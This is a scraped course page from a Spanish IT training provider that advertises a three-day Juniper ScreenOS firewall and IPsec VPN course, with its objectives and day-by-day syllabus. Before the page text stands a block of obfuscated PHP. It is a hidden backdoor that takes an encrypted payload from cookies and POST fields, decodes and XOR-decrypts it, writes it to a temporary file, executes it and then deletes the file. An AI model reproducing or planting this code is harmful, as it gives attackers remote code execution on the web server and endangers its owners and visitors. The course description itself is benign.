$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Configuring Juniper Networks Firewall/IPsec VPN Products|Grupo Loyal

Configuring Juniper Networks Firewall/IPsec VPN Products

This course is the first in the ScreenOS curriculum. It is a three-day, instructor-led course that focuses on configuration of the ScreenOS firewall/virtual private network (VPN) products in a variety of situations, including basic administrative access, routing, firewall policies and policy options, attack prevention features, address translation, and VPN implementations. This course is based on ScreenOS version 6.3r14.

Objetivos

After successfully completing this course, you should be able to:

Explain the ScreenOS security architecture.
Configure administrative access and options.
Back up and restore configuration and ScreenOS files.
Configure a ScreenOS device in transparent, route, Network Address Translation (NAT), and IP version 6 (IPv6) modes.
Discuss the applications of multiple virtual routers.
Configure the ScreenOS firewall to permit and deny traffic based on user-defined policies.
Configure advanced policy options.
Identify and configure network designs for various types of network address translation.
Configure policy-based and route-based VPN tunnels.

Ciberseguridad

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
15 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

This course is intended for network engineers, support personnel, reseller support, and others responsible for implementing Juniper Networks firewall products.

Conocimientos requeridos

This course assumes that students have basic networking knowledge and experience in the following areas:

The Internet;
Networking concepts; and
Terms including TCP/IP, bridging, switching, and routing.

Temario

Day 1

Chapter 1: Course Introduction

Chapter 2: ScreenOS Concepts, Terminology, and Platforms

Security Device Requirements
ScreenOS Security Architecture
Juniper Networks Platforms
Chapter 3: Initial Connectivity

System Components
Establishing Connectivity
Verifying Connectivity
Lab: Initial Configuration
Chapter 4: Device Management

Management
Recovery
Lab: Device Administration
Day 2

Chapter 5: Layer 3 Operations

Need for Routing
Configuring Layer 3
Verifying Layer 3
Loopback Interface
Interface-Based NAT
Lab: Layer 3 Operations
Chapter 6: Basic Policy Configuration

Functionality
Policy Configuration
Common Problems
Global Policy
Verifying Policies
Lab: Basic Policy Configuration
Chapter 7: Policy Options

Overview
Logging
Counting
Scheduling
User Authentication
Lab: Policy Options
Chapter 8: Address Translation

Scenarios
NAT-src
NAT-dst
VIP Addresses
MIP Addresses
Lab: Address Translation
Day 3

Chapter 9: VPN Concepts

Concepts and Terminology
IP Security
Chapter 10: Policy-Based VPNs

Configuration
Verifying Operations
Lab: Policy-Based VPNs
Chapter 11: Route-Based VPNs

Concepts and Terminology
Configuring VPNs
Verifying Operations
Lab: Route-Based VPNs
Chapter 12: IPv6

IPv6 Concepts
Configuring IPv6
Verifying IPv6
Lab: IPv6
Appendix A: Additional Features

Hardware
Appendix B: Transparent Mode

Description
Configuration
Verifying Operations
Lab: Transparent Mode (Optional)

Solicita información del curso

It Formacion

It Formacion